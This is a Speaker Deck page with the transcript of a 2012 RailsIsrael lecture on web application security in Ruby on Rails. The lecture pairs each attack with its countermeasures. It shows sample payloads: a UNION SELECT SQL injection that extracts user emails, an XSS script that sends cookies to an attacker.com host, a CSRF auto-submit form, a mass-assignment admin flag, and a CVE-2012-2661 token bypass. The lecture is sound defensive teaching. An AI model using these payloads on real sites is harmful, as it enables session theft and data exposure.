Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web Application Security in Rails
Search
Uri Nativ
November 12, 2012
Programming
3
560
Web Application Security in Rails
#railsisrael 2012 lecture on web application security in rails
Uri Nativ
November 12, 2012
Tweet
Share
More Decks by Uri Nativ
See All by Uri Nativ
QA without QA
unativ
8
1.5k
Building an Awesome Engineering Culture
unativ
2
270
Pecha Kucha - Using Scrum Values to Build the Engineering Culture
unativ
0
290
Other Decks in Programming
See All in Programming
Composerが「依存解決」のためにどんな工夫をしているか #phpcon
o0h
PRO
1
250
0626 Findy Product Manager LT Night_高田スライド_speaker deck用
mana_takada
0
150
なぜ「共通化」を考え、失敗を繰り返すのか
rinchoku
1
640
CursorはMCPを使った方が良いぞ
taigakono
1
240
ニーリーにおけるプロダクトエンジニア
nealle
0
780
AIと”コードの評価関数”を共有する / Share the "code evaluation function" with AI
euglena1215
1
140
『自分のデータだけ見せたい!』を叶える──Laravel × Casbin で複雑権限をスッキリ解きほぐす 25 分
akitotsukahara
2
620
WindowInsetsだってテストしたい
ryunen344
1
240
今ならAmazon ECSのサービス間通信をどう選ぶか / Selection of ECS Interservice Communication 2025
tkikuc
21
3.9k
Is Xcode slowly dying out in 2025?
uetyo
1
260
NPOでのDevinの活用
codeforeveryone
0
790
イベントストーミング図からコードへの変換手順 / Procedure for Converting Event Storming Diagrams to Code
nrslib
2
640
Featured
See All Featured
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
229
22k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
50k
Balancing Empowerment & Direction
lara
1
410
Scaling GitHub
holman
459
140k
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
Code Review Best Practice
trishagee
69
18k
Being A Developer After 40
akosma
90
590k
Testing 201, or: Great Expectations
jmmastey
42
7.6k
Code Reviewing Like a Champion
maltzj
524
40k
Mobile First: as difficult as doing things right
swwweet
223
9.7k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
44
2.4k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
46
9.6k
Transcript
WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012
Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael
Buy Now, Pay Later 1. Shop online 2. Receive your
goods 3. Pay
Alice
Bob
Alice and Bob
Alice and Bob
Alice and Bob Like Duh?
Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$
Alice and Bob Hack it!
SQL INJECTION
@results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’
WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT
1, email, 1, 1, 1 FROM users -- %') SQL Injection
@results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection
- countermeasures
CROSS SITE SCRIPTING XSS
<span class="content"> <%= raw feed_item.content %> </span> XSS
<script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>
XSS
<span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>
XSS - countermeasures
The Attack: Execute arbitrary code / defacement JSON is not
escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS
CROSS SITE REQUEST FORGERY CSRF
www.blog.com CSRF 1
www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform”
action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF
3
www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST
/blogpost Content=“Kick Me!” CSRF 4
<input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF –
Authenticity Token
routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF
class ApplicationController < ActionController::Base # commented to easily test forms
# protect_from_forgery ... end CSRF
The Attack: Attacker send requests on the victim’s behalf Doesn’t
depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT boo[gotcha!]
def create @user = User.new(params[:user]) ... end Mass Assignment
def create @user = User.new(params[:user]) ... end Mass Assignment {
:name => “gotcha”, :admin => true }
Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass
Assignment - countermeasures
Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation
... Mass Assignment - countermeasures
Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment -
countermeasures
The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong
Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.*
FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection
/users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND
users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection
------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross
Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10 Follow Rails conventions
Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions
Daniel Amselem for pair programming Irit Shainzinger for the cool
graphics Michael Hartl for his microblogging app tutorial Thanks to…
Pay Online – Safer and Simpler https://github.com/unativ/sample_app